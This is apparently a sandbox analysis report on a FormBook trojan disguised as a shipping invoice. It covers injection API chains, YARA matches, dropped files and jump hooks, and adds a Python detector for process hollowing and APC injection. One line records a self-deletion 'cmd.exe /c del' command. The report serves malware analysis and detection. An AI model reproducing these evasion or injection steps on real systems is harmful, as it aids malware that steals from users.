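The stubs listed above for cmd.exe (process 2) and netsh.exe (process 9) are the same set at different bases: NtCreateProcessEx, NtUnmapViewOfSection, NtMapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtSetContextThread, NtQueueApcThread, NtResumeThread. Any one of them is used by legitimate software; what the summary signatures (process hollowing, thread injection, APC queueing) are really saying is that they occurred together against the same foreign process. The Python below is an added example, not part of the Joe Sandbox report and not the sample's code. It shows how a detection correlates such calls per (caller, target) pair instead of alerting on single APIs, using a constructed API trace that mirrors the chain this report describes (a process created suspended, its image unmapped and rewritten, its thread context replaced and resumed; later a section mapped plus an APC queued into a second process) together with a benign control that only creates and resumes a suspended child. The process IDs, sizes and the parent/child relationships in the trace are assumptions, not values taken from the report.

```python
"""Correlate per-process API calls into process-injection verdicts.

Added example; not part of the Joe Sandbox report and not the sample's code.
TRACE is constructed; pids, sizes and who-injects-whom are assumptions.
"""
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004

# Constructed trace: (caller pid, API name, arguments). "target" is the pid the
# handle argument resolves to; a real API monitor hands you a handle and you map
# it back to a pid at CreateProcess/NtOpenProcess time.
TRACE = [
    (1, "CreateProcessA", {"image": "cmd.exe", "flags": CREATE_SUSPENDED, "target": 2}),
    (1, "NtUnmapViewOfSection", {"target": 2}),
    (1, "NtAllocateVirtualMemory", {"target": 2, "protect": "PAGE_EXECUTE_READWRITE"}),
    (1, "NtWriteVirtualMemory", {"target": 2, "size": 0x2A000}),
    (1, "NtSetContextThread", {"target": 2}),
    (1, "NtResumeThread", {"target": 2}),
    (2, "NtOpenProcess", {"target": 4}),
    (2, "NtMapViewOfSection", {"target": 4, "protect": "PAGE_EXECUTE_READWRITE"}),
    (2, "NtQueueApcThread", {"target": 4}),
    (2, "NtResumeThread", {"target": 4}),
    (2, "NtAllocateVirtualMemory", {"target": 2, "protect": "PAGE_READWRITE"}),  # self-directed: ignored
    # Benign control: a parent that starts a child suspended and resumes it untouched.
    (7, "CreateProcessA", {"image": "notepad.exe", "flags": CREATE_SUSPENDED, "target": 8}),
    (7, "NtResumeThread", {"target": 8}),
]

# API -> injection primitive. Calls that need a flag or protection check are
# handled in code below.
PRIMITIVE = {
    "NtUnmapViewOfSection": "unmap",
    "NtWriteVirtualMemory": "write",
    "NtMapViewOfSection": "map_section",
    "NtSetContextThread": "set_context",
    "NtQueueApcThread": "queue_apc",
    "NtResumeThread": "resume",
}


def primitives(trace):
    """Collapse the trace into, per (caller, target) pair, the set of primitives seen."""
    seen = defaultdict(set)
    for caller, api, args in trace:
        target = args.get("target")
        if target is None or target == caller:
            continue  # only cross-process activity is of interest here
        key = (caller, target)
        if api.startswith("CreateProcess"):
            if args.get("flags", 0) & CREATE_SUSPENDED:
                seen[key].add("suspended_create")
        elif api == "NtAllocateVirtualMemory":
            if args.get("protect") == "PAGE_EXECUTE_READWRITE":
                seen[key].add("alloc_rwx")
        elif api in PRIMITIVE:
            seen[key].add(PRIMITIVE[api])
    return seen


def classify(trace):
    """Name the technique(s) per (caller, target). A suspended create followed by
    a plain resume is not enough on its own: the target's memory must have been
    replaced or written and a thread redirected into it."""
    verdicts = {}
    for key, prims in primitives(trace).items():
        found = []
        wrote = bool(prims & {"write", "map_section"})
        replaced = bool(prims & {"unmap", "alloc_rwx"})
        if {"suspended_create", "set_context", "resume"} <= prims and wrote and replaced:
            found.append("process_hollowing")
        elif wrote and "set_context" in prims:
            found.append("thread_context_hijack")
        if wrote and "queue_apc" in prims:
            found.append("apc_injection")
        verdicts[key] = found
    return verdicts


if __name__ == "__main__":
    for (caller, target), found in sorted(classify(TRACE).items()):
        print("pid %d -> pid %d: %s" % (caller, target, ", ".join(found) or "no injection"))
```

The benign pair (7, 8) comes out clean even though it also created a child suspended, which is the point of keying on the pair and requiring a write or map plus a redirected thread; feeding the same logic with Sysmon or ETW events instead of a sandbox trace only changes the `primitives` mapping, not `classify`.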
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033A9
Note: 0_2_004033A9 is the entry point of the NSIS installer stub that wraps the payload (cf. the nsis.sf.net strings under Networking); the OpenProcessToken/LookupPrivilegeValueA/AdjustTokenPrivileges/ExitWindowsEx tail is the installer's reboot-after-install path, not a capability of the FormBook payload.
Detected potential crypto function
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00406943 0_2_00406943
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_0040711A 0_2_0040711A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10001BB0 1_2_10001BB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10004700 1_2_10004700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_10006325 1_2_10006325
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041CB17 2_2_0041CB17
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041CB1A 2_2_0041CB1A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041B466 2_2_0041B466
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00408C2B 2_2_00408C2B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00408C30 2_2_00408C30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00402D87 2_2_00402D87
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B30D20 2_2_04B30D20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04C01D55 2_2_04C01D55
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B56E30 2_2_04B56E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B4B090 2_2_04B4B090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04BF1002 2_2_04BF1002
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B54120 2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B3F900 2_2_04B3F900
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B6EBB0 2_2_04B6EBB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372AB40 9_2_0372AB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037ACB4F 9_2_037ACB4F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D2B28 9_2_037D2B28
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A309 9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037B23E3 9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C03DA 9_2_037C03DA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373ABD8 9_2_0373ABD8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CDBD2 9_2_037CDBD2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373EBB0 9_2_0373EBB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0373138B 9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B236 9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037BFA2B 9_2_037BFA2B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4AEF 9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D22AE 9_2_037D22AE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03724120 9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0370F900 9_2_0370F900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037299BF 9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372A830 9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037DE824 9_2_037DE824
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C1002 9_2_037C1002
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D28EC 9_2_037D28EC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037320A0 9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D20A8 9_2_037D20A8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371B090 9_2_0371B090
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D1FF1 9_2_037D1FF1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037DDFCE 9_2_037DDFCE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03726E30 9_2_03726E30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CD616 9_2_037CD616
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D2EF7 9_2_037D2EF7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D1D55 9_2_037D1D55
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03700D20 9_2_03700D20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D2D07 9_2_037D2D07
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371D5E0 9_2_0371D5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037D25DD 9_2_037D25DD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03732581 9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C2D82 9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0372B477 9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037CD466 9_2_037CD466
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0371841F 9_2_0371841F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037C4496 9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7CB17 9_2_02F7CB17
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7CB1A 9_2_02F7CB1A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F62FB0 9_2_02F62FB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7B466 9_2_02F7B466
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F68C30 9_2_02F68C30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F68C2B 9_2_02F68C2B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F62D90 9_2_02F62D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F62D87 9_2_02F62D87
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 0370B150 appears 136 times
PE file contains strange resources
Source: Shipping INVOICE-BL Shipment..exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Shipping INVOICE-BL Shipment..exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DevCfgUI.dll.0.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
PE file does not import any functions
Source: DevCfgUI.dll.0.dr Static PE information: No import functions for PE file found
Tries to load missing DLLs
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: sfc.dll
Yara signature match
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/27@11/6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_100019C0 Cremaster,CertOpenSystemStoreA,EqualSid,FlushFileBuffers,GetWindowThreadProcessId,ReleaseSemaphore,LoadBitmapA,ScrollDC,SetScrollPos,HeapDestroy,ReadFile, 1_2_100019C0
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033A9
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404686
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar, 0_2_00402138
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Roaming\pkgs
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\nse53A6.tmp
Source: Shipping INVOICE-BL Shipment..exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
Source: Shipping INVOICE-BL Shipment..exe Virustotal: Detection: 27%
Source: Shipping INVOICE-BL Shipment..exe ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File read: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
Source: unknown Process created: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: unknown Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: Shipping INVOICE-BL Shipment..exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: vjscsvr.pdb source: nse53A7.tmp.0.dr
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\rcxdtiui.pdb source: rcxditui.dll.0.dr
Source: Binary string: netsh.pdb source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb$ source: MSBuildFramework.dll.0.dr
Source: Binary string: netsh.pdbGCTL source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, netsh.exe, 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp
Source: Binary string: cmd.pdbUGP source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: cmd.exe, netsh.exe
Source: Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb source: MSBuildFramework.dll.0.dr
Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdbQ" source: nse53A7.tmp.0.dr
Source: Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\dbsvcui.pdb source: nse53A7.tmp.0.dr
Source: Binary string: cmd.pdb source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
Source: Binary string: MakeCert.pdb source: makecert.exe.0.dr
Source: Binary string: guidgen.pdb source: guidgen.exe.0.dr
Source: Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdb source: nse53A7.tmp.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_1000734B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 1_2_1000734B
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_100046E5 push ecx; ret 1_2_100046F8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041C952 push es; ret 2_2_0041C954
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041B375 push eax; ret 2_2_0041B3C8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041B3C2 push eax; ret 2_2_0041B3C8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041B3CB push eax; ret 2_2_0041B432
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00409412 push ss; ret 2_2_00409415
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041B42C push eax; ret 2_2_0041B432
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00414D93 push 5C0B9774h; iretd 2_2_00414DBA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00414EE9 push ebp; ret 2_2_00414F0A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B8D0D1 push ecx; ret 2_2_04B8D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0375D0D1 push ecx; ret 9_2_0375D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7B3C2 push eax; ret 9_2_02F7B3C8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7B3CB push eax; ret 9_2_02F7B432
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7B375 push eax; ret 9_2_02F7B3C8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7C952 push es; ret 9_2_02F7C954
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F74EE9 push ebp; ret 9_2_02F74F0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7B42C push eax; ret 9_2_02F7B432
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F69412 push ss; ret 9_2_02F69415
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F74D93 push 5C0B9774h; iretd 9_2_02F74DBA

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\Prehnite.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe File created: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 77165050 value: E9 EB 61 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 771650F0 value: E9 5B 61 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 77165180 value: E9 9B 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 77165190 value: E9 CB 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 771651A0 value: E9 4B 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 7717FEE0 value: E9 9B FF FF FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 771133C0 value: E9 FB 6F 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 77114760 value: E9 2B 6B 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 770D6590 value: E9 0B 00 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 770DB510 value: E9 2B 53 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 770FC490 value: E9 0B 00 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 7711EE00 value: E9 E1 52 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 1748 base: 7711EFD0 value: E9 26 5B 00 00
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF
